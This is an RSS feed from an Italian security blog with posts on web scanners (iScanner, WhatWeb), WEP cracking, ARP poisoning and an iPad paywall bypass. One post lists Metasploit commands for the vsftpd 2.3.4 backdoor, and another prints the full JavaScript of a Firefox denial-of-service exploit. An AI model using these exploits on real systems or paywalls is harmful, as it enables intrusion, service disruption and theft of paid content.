<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Over Security &#187; Articoli Tecnici</title>
	<atom:link href="http://www.oversecurity.net/category/at/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.oversecurity.net</link>
	<description>Il Blog Italiano di Sicurezza Informatica</description>
	<lastBuildDate>Sun, 05 Feb 2012 08:38:09 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>iScanner &#8211; Utility per individuare eventuali pagine web infette</title>
		<link>http://www.oversecurity.net/2011/10/31/iscanner-utility-per-individuare-eventuali-pagine-web-infette/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=iscanner-utility-per-individuare-eventuali-pagine-web-infette</link>
		<comments>http://www.oversecurity.net/2011/10/31/iscanner-utility-per-individuare-eventuali-pagine-web-infette/#comments</comments>
		<pubDate>Mon, 31 Oct 2011 08:15:56 +0000</pubDate>
		<dc:creator>Andrea Draghetti</dc:creator>
				<category><![CDATA[Articoli Tecnici]]></category>
		<category><![CDATA[codice malevolo]]></category>
		<category><![CDATA[iScanner]]></category>
		<category><![CDATA[Italian Security Mailing List]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[mailing list]]></category>
		<category><![CDATA[offuscamento]]></category>
		<category><![CDATA[sikurezza]]></category>
		<category><![CDATA[sikurezza.org]]></category>

		<guid isPermaLink="false">http://www.oversecurity.net/?p=3088</guid>
		<description><![CDATA[iScanner è un software scritto in Ruby che permette di individuare ed eventualmente rimuovere codice maligno all&#8217;interno delle pagine web, nello specifico l&#8217;applicativo permette: Rilevamento di codice maligno all’interno delle pagine web; Rimozione automatica di un eventuale codice sospetto all&#8217;interno delle pagine web; Sistema di Backup dei file elaborati; Database aggiornabile; Report all&#8217;interno di un [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><a href="http://www.oversecurity.net/wp-content/uploads/2011/10/Schermata-10-2455865-alle-21.37.56.png" rel="lightbox[3088]" title="iScanner"><img src='http://www.oversecurity.net/wp-content/uploads/2011/10/Schermata-10-2455865-alle-21.37.56-1024x640.png' class='aligncenter size-large wp-image-3089' width='600' height='375'/></a></p>
<p style="text-align: left;"><strong>iScanner</strong> è un software scritto in Ruby che permette di individuare ed eventualmente rimuovere <strong>codice maligno</strong> all&#8217;interno delle pagine web, nello specifico l&#8217;applicativo permette:</p>
<p style="text-align: left;">
<ul>
<li>Rilevamento di codice maligno all’interno delle pagine web;</li>
<li>Rimozione automatica di un eventuale codice sospetto all&#8217;interno delle pagine web;</li>
<li>Sistema di Backup dei file elaborati;</li>
<li>Database aggiornabile;</li>
<li>Report all&#8217;interno di un file di log delle minacce rilevate con la possibilità di inviare una eMail riepilogativa.</li>
</ul>
<p>L&#8217;<strong>installazione</strong> del software è veramente molto semplice, una volta effettuato il <a href="http://iscanner.isecur1ty.org/" target="_blank">Download</a> dell&#8217;applicativo ed estratto l&#8217;archivio basterà digitare da shell il seguente comando:</p>
<blockquote><p>./installer -i</p></blockquote>
<p>successivamente lanciando il comando:</p>
<blockquote><p>iscanner .h</p></blockquote>
<p>è possibile visualizzare tutti i <strong>comandi</strong> disponibili che per comodità vi riepilogo dopo il salto.</p>
<p>Nell&#8217;immagine principale ho <strong>analizzato</strong> un sito web segnalatomi attraverso la Mailing List  <a href="http://www.sikurezza.org/" target="_blank">Sikurezza.org</a> (Italian Security Mailing List) nella quale un utente richiedeva maggiori informazioni di attendibilità del sito <a href="http://www.glandorepartners.com/" target="_blank">glandorepartners.com</a> e come lo stesso utente prevedeva la pagina web contiene un codice Javascript offuscato.</p>
<p>Un codice Javascript offuscato solitamente è portatore di operazioni malevoli ma non è sempre scontato, pertanto conviene successivamente analizzare il codice estrapolandolo dal file di log e con un po&#8217; di pazienza procediamo all&#8217;analisi.</p>
<p>Nell&#8217;esempio riportato il presunto codice malevolo invia ad ogni accesso al sito web una eMail all&#8217;indirizzo <em>acollins [AT] glandorehealthcare.com</em> informando il webmaster della nostra visita.</p>
<p><span id="more-3088"></span></p>
<p><strong>Principali comandi di iScanner</strong></p>
<blockquote><p>    -R        Use this option to scan a remote web page / website.<br />
# iscanner -R http://example.com</p>
<p>-F        Use this option to scan a specific file.<br />
# iscanner -F /home/user/file.php</p>
<p>-f        Use this option to scan a specific directory.<br />
# iscanner -f /home/user</p>
<p>-e      This option will allow you to select specific file extensions for<br />
scanning, by default iScanner will scan [htm, html, php, js] if you<br />
wanted to scan other or specific extensions only:<br />
# iscanner -f /home/user -e htm:html</p>
<p>-d      By default iScanner will load the latest version of signatures<br />
database in the folder, if wanted to use older or modified version<br />
of the database:<br />
# iscanner -f /home/user -d database.db</p>
<p>-M      Using this option allows you to specify malware code and iScanner<br />
will automatically generate regex signature for it then scan the<br />
files / website you want (incase you wanted to scan for specific<br />
code or undetected malware!)<br />
# iscanner -M /home/user/malware_code.txt -f /home/user<br />
# iscanner -M /home/user/malware_code.txt -R http://example.com</p>
<p>-o      Using this option will allow you to choose the name of the infected<br />
log file. If this option wasn&#8217;t used the name of the infected log<br />
file will be in this format &#8220;infected-[TIME]-[DATE].log&#8221;, if you<br />
wanted to select other name:<br />
# iscanner -f /home/user -o user.log</p>
<p>-m      With this option you can tell iScanner to send a copy of the<br />
infected log to selected email address:<br />
# iscanner -f /home/user -m email@example.com</p>
<p>-c      This option will clean the infected files by removing the malicious<br />
code only without deleting the infected files. Before using this<br />
option make sure to check the infected log to know what exactly<br />
iScanner is going to remove from each infected file.<br />
# iscanner -c infected.log</p>
<p>-b      If you used this option iScanner will take backup from the infected<br />
files before cleaning it. You can find backup of the cleaned files<br />
in a folder have the name &#8220;backup-[TIME]-[DATE]&#8220;.<br />
# iscanner -b -c infected.log</p>
<p>-r      If you used the previous option when cleanning the infected log and<br />
something went wrong, use this option to restore the files from the<br />
backup directory.<br />
# iscanner -r backup/</p>
<p>-a      Using this option will make iScanner clean every infected file<br />
automatically. This option could be dangerous if you didn&#8217;t scan<br />
the folder before and you don&#8217;t know the results.<br />
# iscanner -f /home/user -a</p>
<p>-D      This option will make iScanner run in the debug mode, the option<br />
will be useful if you had problem while running iScanner.<br />
# iscanner -f /home/user -D</p>
<p>-q      If you don&#8217;t want to see any output from iScanner you can enable<br />
this option to make the program run in the quit mode.<br />
# iscanner -f /home/user -q</p>
<p>-s      This option allows you to send malicious file to iScanner&#8217;s<br />
developers for analyses. This will help us improve the signatures<br />
database and keeping it updated.<br />
# iscanner -s /home/user/malicious_file.html</p>
<p>-U      With this option you can update iScanner and the signatures<br />
database to the latest version easily.<br />
# iscanner -U</p>
<p>-u      This option will update the signatures database only instead of<br />
updating the whole program.<br />
# iscanner -u</p>
<p>-v      This option will print iScanner&#8217;s version and release date with<br />
the database version and it&#8217;s release date too.<br />
# iscanner -v</p>
<p>-h      This option will show the help message.<br />
# iscanner -h</p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://www.oversecurity.net/2011/10/31/iscanner-utility-per-individuare-eventuali-pagine-web-infette/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>[VIDEO] Dimostrazione della BackDoor di VSFTPD</title>
		<link>http://www.oversecurity.net/2011/07/07/video-dimostrazione-della-backdoor-di-vsftpd/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=video-dimostrazione-della-backdoor-di-vsftpd</link>
		<comments>http://www.oversecurity.net/2011/07/07/video-dimostrazione-della-backdoor-di-vsftpd/#comments</comments>
		<pubDate>Thu, 07 Jul 2011 19:44:39 +0000</pubDate>
		<dc:creator>Andrea Draghetti</dc:creator>
				<category><![CDATA[Articoli Tecnici]]></category>
		<category><![CDATA[backdoor]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Metasploit]]></category>
		<category><![CDATA[VSFTPD]]></category>
		<category><![CDATA[vsftpd-2.3.4]]></category>

		<guid isPermaLink="false">http://www.oversecurity.net/?p=2629</guid>
		<description><![CDATA[Versione: vsftpd-2.3.4 del 30/06/2011 Dimostrazione Metasploit: use exploit/unix/ftp/vsftpd_234_backdoor set RHOST localhost set PAYLOAD cmd/unix/interact exploit id uname -a]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><p><a href="http://www.oversecurity.net/2011/07/07/video-dimostrazione-della-backdoor-di-vsftpd/"><em>Clicca qui per vedere il video incorporato.</em></a></p></p>
<p style="text-align: left;"><strong>Versione:</strong><br />
vsftpd-2.3.4 del 30/06/2011</p>
<p><strong>Dimostrazione Metasploit:</strong><br />
use exploit/unix/ftp/vsftpd_234_backdoor<br />
set RHOST localhost<br />
set PAYLOAD cmd/unix/interact<br />
exploit<br />
id<br />
uname -a</p>
]]></content:encoded>
			<wfw:commentRss>http://www.oversecurity.net/2011/07/07/video-dimostrazione-della-backdoor-di-vsftpd/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>WhatWeb: web scanner!</title>
		<link>http://www.oversecurity.net/2011/06/18/whatweb-web-scanner/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=whatweb-web-scanner</link>
		<comments>http://www.oversecurity.net/2011/06/18/whatweb-web-scanner/#comments</comments>
		<pubDate>Sat, 18 Jun 2011 14:22:11 +0000</pubDate>
		<dc:creator>Andrea Draghetti</dc:creator>
				<category><![CDATA[Articoli Tecnici]]></category>
		<category><![CDATA[Guide]]></category>
		<category><![CDATA[Andrew Horton]]></category>
		<category><![CDATA[scanner]]></category>
		<category><![CDATA[web]]></category>
		<category><![CDATA[web scanner]]></category>
		<category><![CDATA[website]]></category>
		<category><![CDATA[whatweb]]></category>

		<guid isPermaLink="false">http://www.oversecurity.net/?p=2549</guid>
		<description><![CDATA[WhatWeb è un tool sviluppato da Andrew Horton nel Novembre del 2009 ed ha come scopo l’estrapolazione di maggiori informazioni tecniche su uno o più host. Per informazioni tecniche si intendono tutti i dati rilevanti per una corretta analisi di IT Security quali la versione del server Apache, PHP, CMS ed altre informazioni che andremo [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><a href="http://www.oversecurity.net/wp-content/uploads/2011/06/whatweb.png"></a><a href="http://www.oversecurity.net/wp-content/uploads/2011/06/whatweb-heading.jpg" rel="lightbox[2549]" title="whatweb-heading"><img src='http://www.oversecurity.net/wp-content/uploads/2011/06/whatweb-heading.jpg' class='aligncenter size-full wp-image-2552' width='600' height='135.117056856'/></a></p>
<p><strong>WhatWeb</strong> è un tool sviluppato da Andrew Horton nel Novembre del 2009 ed ha come scopo l’estrapolazione di maggiori informazioni tecniche su uno o più host. Per informazioni tecniche si intendono tutti i dati rilevanti per una corretta analisi di IT Security quali la versione del<br />
server Apache, PHP, CMS ed altre informazioni che andremo a scoprire in questo articolo.</p>
<h2><strong>Installazione</strong></h2>
<p>WhatWeb è un applicativo per ambienti Linux e richiede Ruby per poter funzionare ed altre importanti dipendenze, di seguito vi riporto un esempio di installazione in ambiente Ubuntu.</p>
<p>Innanzitutto installiamo Ruby da riga di comando con il seguente comando:</p>
<blockquote><p>sudo apt-get install ruby ruby-dev libopenssl-ruby rubygems1.8</p></blockquote>
<p>successivamente dovremo installare le seguenti dipendenze di Ruby, sempre da riga di comando imputiamo:</p>
<blockquote><p>sudo gem install anemone em-resolv-replace json bson bson_ext mongo rchardet</p></blockquote>
<p>Terminata questa prima fase scaricate WhatWeb dal sito di Andrew Norton (http://bit.ly/kspIud) e salvatelo dove preferite.</p>
<h2><strong>Avvio</strong></h2>
<p>L’avvio di WhatWeb è veramente semplicissimo, si utilizza esclusivamente da riga di comando, basterà digitare il comando <em>./whatweb</em> che immediatamente ci apparirà a monitor l’help con tutti i possibili comandi da sfruttare.</p>
<p><a href="http://www.oversecurity.net/wp-content/uploads/2011/06/whatweb.png" rel="lightbox[2549]" title="whatweb"><img src='http://www.oversecurity.net/wp-content/uploads/2011/06/whatweb.png' class='aligncenter size-full wp-image-2550' width='600' height='1932.51533742'/></a></p>
<h2><strong>Utilizzo</strong></h2>
<p>L’imponente Help che vi è apparso a monitor una volta lanciato l’applicativo non vi deve spaventare <img src='http://www.oversecurity.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  l’utilizzo è abbastanza semplice e comunque vi riepilogherò le principali funzioni.<br />
WhatWeb funziona attraverso dei plugin, più di 800, che permettono la corretta scansione di un host e vengono gestiti dal software in base al livello di “aggressione” che preferite:</p>
<ol>
<li>1. PASSIVA: Effettua una sola richiesta sul target, fatta eccezione per i reindirizzamenti.</li>
<li>2. VUOTO: Livello ad oggi non implementato, verrà sviluppato in futuro.</li>
<li>3. AGGRESSIVO: Effettua una scansione approfondita del host principale</li>
<li>4. PESANTE: Scassinamento approfondito su tutti gli URL del host.</li>
</ol>
<p>Il livello di default è il primo, ma personalmente vi consiglio di utilizzare sempre il terzo ed attivare la modalità VERBOSE in modo da avere nozioni più esplicative.<br />
È inoltre possibile impostare l’User Agent, il server Proxy, l’esportazione personalizzata dei log e la possibilità di gestire i redirect.</p>
<h2>Esempio</h2>
<p style="text-align: center;"><a href="http://www.oversecurity.net/wp-content/uploads/2011/06/IMMAGGINE_SCANSIONE.png" rel="lightbox[2549]" title="IMMAGGINE_SCANSIONE"><img src='http://www.oversecurity.net/wp-content/uploads/2011/06/IMMAGGINE_SCANSIONE.png' class='aligncenter size-full wp-image-2551' width='600' height='93.0379746835'/></a></p>
<p>Lanciando il seguente comando:</p>
<blockquote><p>whatweb &#8211;log-verbose=log.txt &#8211;aggression=3 www.iltrillo.com</p></blockquote>
<p>andremo ad avviare il programma con il terzo livello di aggressività e gli chiederemo di generare un file “log.txt” contenente il risultato in modalità verbose della scansione ma di riportarci a monitor immediatamente le nozioni essenziali sul host www.iltrillo.com.<br />
Visualizzando il risultato della scansione notiamo immediatamente che il software ha analizzato l’host da noi fornitogli ma ha proseguito ad analizzare il redirect www.iltrillo.com/forum/ dal quale possiamo trarre nozioni importanti.</p>
<p>Il server che ospita il nostro Host è di tipo Unix con Apache 2.0.63 e PHP 5.2.14. Si trova in Olanda, le nostre visite vengono monitorate tramite Google Analytics, il forum è basato sulla piattaforma vBulletin 4.0.4 e vi è un blog basato su WordPress.</p>
<p>Basterà pertanto approfondire le ricerche per capire se le versioni rilevate soffrono di Exploit permettendoci di compilare un completo report da IT Security Researcher.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.oversecurity.net/2011/06/18/whatweb-web-scanner/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>WEP Cracking, with BackBox &amp; WepCrackGUI!</title>
		<link>http://www.oversecurity.net/2011/01/23/wep-cracking-with-backbox-wepcrackgui/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=wep-cracking-with-backbox-wepcrackgui</link>
		<comments>http://www.oversecurity.net/2011/01/23/wep-cracking-with-backbox-wepcrackgui/#comments</comments>
		<pubDate>Sun, 23 Jan 2011 17:00:49 +0000</pubDate>
		<dc:creator>Andrea Draghetti</dc:creator>
				<category><![CDATA[Articoli Tecnici]]></category>
		<category><![CDATA[Guide]]></category>
		<category><![CDATA[aircrack-ng]]></category>
		<category><![CDATA[BackBox]]></category>
		<category><![CDATA[craking]]></category>
		<category><![CDATA[Guida]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[video]]></category>
		<category><![CDATA[video guida]]></category>
		<category><![CDATA[wep]]></category>
		<category><![CDATA[wep craking]]></category>
		<category><![CDATA[WepCrackGUI]]></category>
		<category><![CDATA[WiFi]]></category>
		<category><![CDATA[Wireless]]></category>

		<guid isPermaLink="false">http://www.oversecurity.net/?p=1931</guid>
		<description><![CDATA[Software Utilizzato Per effettuare questa video guida ho utilizzato WepCrackGUI e la distribuzione Linux BackBox. Note Legali L’accesso abusivo ad un sistema informatico o telematico è un reato perseguibile a termine di legge art. 615-ter c.p. La detenzione, la diffusione abusiva di codici di accesso a sistemi informatici/telematici o condotte prodromiche alla realizzazione di un [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;">
<p style="text-align: center;">
<h2 style="text-align: center;"><p><a href="http://www.oversecurity.net/2011/01/23/wep-cracking-with-backbox-wepcrackgui/"><em>Clicca qui per vedere il video incorporato.</em></a></p></h2>
<h2 style="text-align: left;">Software Utilizzato</h2>
<p style="text-align: left;">Per effettuare questa video guida ho utilizzato <a href="http://www.oversecurity.net/tag/wepcrackgui/">WepCrackGUI</a> e la distribuzione Linux <a href="http://www.oversecurity.net/tag/backbox/" target="_blank">BackBox</a>.</p>
<h2>Note Legali</h2>
<p>L’accesso abusivo ad un sistema informatico o telematico è un reato perseguibile a termine di legge art. 615-ter c.p.</p>
<p>La detenzione, la diffusione abusiva di codici di accesso a sistemi  informatici/telematici o condotte prodromiche alla realizzazione di un  acceso abusivo sono reati penale perseguibili secondo la legge  615-quater c.p.</p>
<p>Pertanto l’utilizzo di quanto esposto è da riferirsi a un test di  sicurezza sulla propria rete o su una rete la quale il proprietario  abbia espressamente dato il libero consenso al fine di giudicarne la  sicurezza e porre rimedio ad eventuali vulnerabilità.</p>
<p>Gli Autori di questo Blog non potranno essere ritenuti responsabili  di eventuali violazioni derivanti da un uso proprio o improprio delle  tecniche esposte in questo articolo aventi uno scopo prettamente  informativo e didattico.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.oversecurity.net/2011/01/23/wep-cracking-with-backbox-wepcrackgui/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>ARP DoS con Scapy e TcpKill su BackBox</title>
		<link>http://www.oversecurity.net/2011/01/19/arp-dos-con-scapy-e-tcpkill-su-backbox/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=arp-dos-con-scapy-e-tcpkill-su-backbox</link>
		<comments>http://www.oversecurity.net/2011/01/19/arp-dos-con-scapy-e-tcpkill-su-backbox/#comments</comments>
		<pubDate>Wed, 19 Jan 2011 17:32:58 +0000</pubDate>
		<dc:creator>Andrea Draghetti</dc:creator>
				<category><![CDATA[Articoli Tecnici]]></category>
		<category><![CDATA[arp]]></category>
		<category><![CDATA[arp dos]]></category>
		<category><![CDATA[arp poisoning.]]></category>
		<category><![CDATA[BackBox]]></category>
		<category><![CDATA[clshack]]></category>
		<category><![CDATA[DOS]]></category>
		<category><![CDATA[Scapy]]></category>
		<category><![CDATA[TCPKill]]></category>

		<guid isPermaLink="false">http://www.oversecurity.net/?p=1924</guid>
		<description><![CDATA[In questo video prodotto da Clshack vediamo come è possibile reindirizzare il traffico dati di un PC verso un host inesistente, oppure bloccare la connessione ad un singolo sito web con tcpkill durante un arp poisoning. Trovate maggiori dettagli sulla configurazione di Scapy direttamente sul sito dell&#8217;autore.]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><p><a href="http://www.oversecurity.net/2011/01/19/arp-dos-con-scapy-e-tcpkill-su-backbox/"><em>Clicca qui per vedere il video incorporato.</em></a></p></p>
<p style="text-align: left;">In questo video prodotto da <a href="http://www.clshack.it" target="_blank">Clshack</a> vediamo come è possibile <strong>reindirizzare</strong> il traffico dati di un PC verso un host <strong>inesistente</strong>, oppure <strong>bloccare</strong> la connessione ad un singolo sito web con tcpkill durante un <strong>arp poisoning</strong>.</p>
<p style="text-align: left;">Trovate maggiori dettagli sulla configurazione di Scapy direttamente sul sito dell&#8217;<a href="http://www.clshack.it/arp-dos-with-scapy-and-tcpkill-on-backbox" target="_blank">autore</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.oversecurity.net/2011/01/19/arp-dos-con-scapy-e-tcpkill-su-backbox/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Installare WepCrackGUI su BackBox</title>
		<link>http://www.oversecurity.net/2010/12/23/installare-wepcrackgui-su-backbox/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=installare-wepcrackgui-su-backbox</link>
		<comments>http://www.oversecurity.net/2010/12/23/installare-wepcrackgui-su-backbox/#comments</comments>
		<pubDate>Thu, 23 Dec 2010 18:08:04 +0000</pubDate>
		<dc:creator>Andrea Draghetti</dc:creator>
				<category><![CDATA[Articoli Tecnici]]></category>
		<category><![CDATA[BackBox]]></category>
		<category><![CDATA[installazione]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[setup]]></category>
		<category><![CDATA[WepCrackGUI]]></category>

		<guid isPermaLink="false">http://www.oversecurity.net/?p=1793</guid>
		<description><![CDATA[Oggi vedremo come installare WepCrackGUI sulla distribuzione BackBox dedicata al penetration testing, innanzitutto scarichiamo il software dal SourceForge e scompattiamolo dopo preferiamo. Da riga di comando dovremo installare Mono e GTK necessari per il corretto avvio di WepCrakGUI, iniziamo con Mono! Avviamo la riga di comando e digitiamo: sudo apt-get install mono-devel ad installazione avvenuta [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><a href="http://www.oversecurity.net/wp-content/uploads/2010/11/WepCrackGui_0_8_4.png" rel="lightbox[1793]" title="WepCrackGui_0_8_4"><img src='http://www.oversecurity.net/wp-content/uploads/2010/11/WepCrackGui_0_8_4.png' class='aligncenter size-full wp-image-1641' width='600' height='401.454545455'/></a></p>
<p style="text-align: left;">Oggi vedremo come installare WepCrackGUI sulla distribuzione <a href="http://www.backbox.org/" target="_blank">BackBox</a> dedicata al penetration testing, innanzitutto scarichiamo il software dal <a href="http://sourceforge.net/projects/wepcrackgui/" target="_blank">SourceForge</a> e scompattiamolo dopo preferiamo.</p>
<p style="text-align: left;">Da riga di comando dovremo installare Mono e GTK necessari per il corretto avvio di WepCrakGUI, iniziamo con Mono! Avviamo la riga di comando e digitiamo:</p>
<blockquote>
<p style="text-align: left;">sudo apt-get install mono-devel</p>
</blockquote>
<p style="text-align: left;">ad installazione avvenuta passiamo subito alle librerie grafiche GTK:</p>
<blockquote>
<p style="text-align: left;">sudo apt-get install gtk-sharp2</p>
</blockquote>
<p style="text-align: left;">perfetto ora potremo avviare WepCrackGUI col classico comando</p>
<blockquote>
<p style="text-align: left;">sudo ./wepcrack</p>
</blockquote>
<p style="text-align: left;">
]]></content:encoded>
			<wfw:commentRss>http://www.oversecurity.net/2010/12/23/installare-wepcrackgui-su-backbox/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>[AGGIORNATO] iPad Newspapers Exploit</title>
		<link>http://www.oversecurity.net/2010/11/27/ipad-newspapers-exploit/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=ipad-newspapers-exploit</link>
		<comments>http://www.oversecurity.net/2010/11/27/ipad-newspapers-exploit/#comments</comments>
		<pubDate>Sat, 27 Nov 2010 22:17:36 +0000</pubDate>
		<dc:creator>Andrea Draghetti</dc:creator>
				<category><![CDATA[Articoli Tecnici]]></category>
		<category><![CDATA[Cronaca Informatica]]></category>
		<category><![CDATA[Apple]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[in-app purchase]]></category>
		<category><![CDATA[iOS]]></category>
		<category><![CDATA[ipad]]></category>
		<category><![CDATA[iPad newspapers exploit]]></category>
		<category><![CDATA[iphone]]></category>
		<category><![CDATA[newspapers]]></category>
		<category><![CDATA[packet sniffer]]></category>
		<category><![CDATA[paperlit]]></category>
		<category><![CDATA[quotidiani]]></category>
		<category><![CDATA[repubblica]]></category>
		<category><![CDATA[riviste]]></category>

		<guid isPermaLink="false">http://www.oversecurity.net/?p=1654</guid>
		<description><![CDATA[Descrizione Questo video ha l&#8217;intento di dimostrarvi come sia possibile aggirare la metodologia di acquisto di una Rivista o Quotidiano nell&#8217;iPad o altro dispositivo iOS, permettendoci di accedere al contenuto desiderato in maniera totalmente gratuita evitando il pagamento del contributo richiesto attraverso In-App Purchase di Apple. Nel video viene dimostrato esclusivamente la fattibilità di quanto [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><p><a href="http://www.oversecurity.net/2010/11/27/ipad-newspapers-exploit/"><em>Clicca qui per vedere il video incorporato.</em></a></p></p>
<h2 style="text-align: left;">Descrizione</h2>
<p style="text-align: left;">Questo video ha l&#8217;intento di dimostrarvi come sia possibile aggirare la metodologia di acquisto di una Rivista o Quotidiano nell&#8217;iPad o altro dispositivo iOS, permettendoci di accedere al contenuto desiderato in maniera totalmente gratuita evitando il pagamento del contributo richiesto attraverso In-App Purchase di Apple.</p>
<p style="text-align: left;">Nel video viene dimostrato esclusivamente la fattibilità di quanto dichiarato ma non verranno, volutamente, esposte le tecniche che portano a tale risultato a tutela del mondo dell&#8217;editoria Italiana ed Internazionale. Per questa motivazione non è visibile nel video la barra degli indirizzi del Browser Safari e non solo.</p>
<h2 style="text-align: left;">Funzionamento</h2>
<p>Dopo una attenta analisi dei pacchetti di rete ricevuti ed inviati (<strong>packet sniffer</strong>) da ogni singola applicazione è possibile determinare la fonte dei quotidiani o riviste, successivamente sfruttando la tecnica di <strong>spoofing</strong> è possibile accedere direttamente da Safari al contenuto desiderato evitando il pagamento tramite l&#8217;In-App Purchase del contributo richiesto dall&#8217;editore.</p>
<p style="text-align: left;">Viene dimostrato il funzionamento dell&#8217;exploit su un ristretto numero di Riviste ed un Quotidiano ma è possibile estendere tale tecnica anche per la lettura di altre testate.</p>
<h2 style="text-align: left;">Conclusione</h2>
<p style="text-align: left;">Tale dimostrazione ha lo scopo di incentivare gli sviluppatori a migliorare le loro applicazioni e a progettare con un maggiore accuratezza le infrastrutture di rete.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.oversecurity.net/2010/11/27/ipad-newspapers-exploit/feed/</wfw:commentRss>
		<slash:comments>20</slash:comments>
		</item>
		<item>
		<title>0day Mozilla Firefox, Denial of Service</title>
		<link>http://www.oversecurity.net/2010/11/13/0day-mozilla-firefox-denial-of-service/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=0day-mozilla-firefox-denial-of-service</link>
		<comments>http://www.oversecurity.net/2010/11/13/0day-mozilla-firefox-denial-of-service/#comments</comments>
		<pubDate>Sat, 13 Nov 2010 18:20:30 +0000</pubDate>
		<dc:creator>Andrea Draghetti</dc:creator>
				<category><![CDATA[Articoli Tecnici]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[0day Mozilla Firefox]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Denial of Service]]></category>
		<category><![CDATA[DOS]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[Firefox]]></category>
		<category><![CDATA[mozilla]]></category>
		<category><![CDATA[Remote Denial of Service]]></category>

		<guid isPermaLink="false">http://www.oversecurity.net/?p=1610</guid>
		<description><![CDATA[Il team Italiano di BackTrack ha recentemente trovato un exploit 0Day per Mozilla Firefox, il quale prevede un Remote Denial of Service. Dopo il salto il codice dell&#8217;exploit&#8230;]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><a href="http://www.oversecurity.net/wp-content/uploads/2010/11/15498.png" rel="lightbox[1610]" title="15498"><img src='http://www.oversecurity.net/wp-content/uploads/2010/11/15498.png' class='aligncenter size-full wp-image-1611' width='600' height='503.841931943'/></a></p>
<p>Il team Italiano di <a href="http://www.backtrack.it/" target="_blank">BackTrack</a> ha recentemente trovato un exploit 0Day per Mozilla Firefox, il quale prevede un Remote Denial of Service.</p>
<p>Dopo il salto il codice dell&#8217;exploit&#8230;</p>
<p><span id="more-1610"></span></p>
<pre class="brush: php; title: ; notranslate">

&amp;amp;lt;!--

0day Mozilla Firefox &amp;amp;lt;= 3.6.12 Remote Denial Of Service

Credits:
Emanuele 'emgent' Gentili    &amp;amp;lt;emgent@backtrack-linux.org&amp;amp;gt;
Marco 'white_sheep' Rondini    &amp;amp;lt;white_sheep@backtrack-linux.org&amp;amp;gt;
Alessandro 'scox' Scoscia    &amp;amp;lt;scox@backtrack.it&amp;amp;gt;

--&amp;amp;gt;

&amp;amp;lt;script&amp;amp;gt;document.write(&quot;\u0000\u0001\u0002\u0003\u0004\u0005&quot;)&amp;amp;lt;/script&amp;amp;gt;
&amp;amp;lt;script&amp;amp;gt;
var i=0;
for (i=0;i&amp;amp;lt;=19999;i++)
{
document.write(&quot;a&quot;);
}

for (i=0;i&amp;amp;lt;=3;i++)
{
document.write(document.body.innerHTML);
}

&amp;amp;lt;/script&amp;amp;gt;
</pre>
]]></content:encoded>
			<wfw:commentRss>http://www.oversecurity.net/2010/11/13/0day-mozilla-firefox-denial-of-service/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>DLL Hijack, video dimostrativo!</title>
		<link>http://www.oversecurity.net/2010/09/06/dll-hijack-video-dimostrativo/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=dll-hijack-video-dimostrativo</link>
		<comments>http://www.oversecurity.net/2010/09/06/dll-hijack-video-dimostrativo/#comments</comments>
		<pubDate>Mon, 06 Sep 2010 09:00:16 +0000</pubDate>
		<dc:creator>Andrea Draghetti</dc:creator>
				<category><![CDATA[Articoli Tecnici]]></category>
		<category><![CDATA[dimostrazione]]></category>
		<category><![CDATA[dll hijack]]></category>
		<category><![CDATA[video]]></category>

		<guid isPermaLink="false">http://www.oversecurity.net/?p=1448</guid>
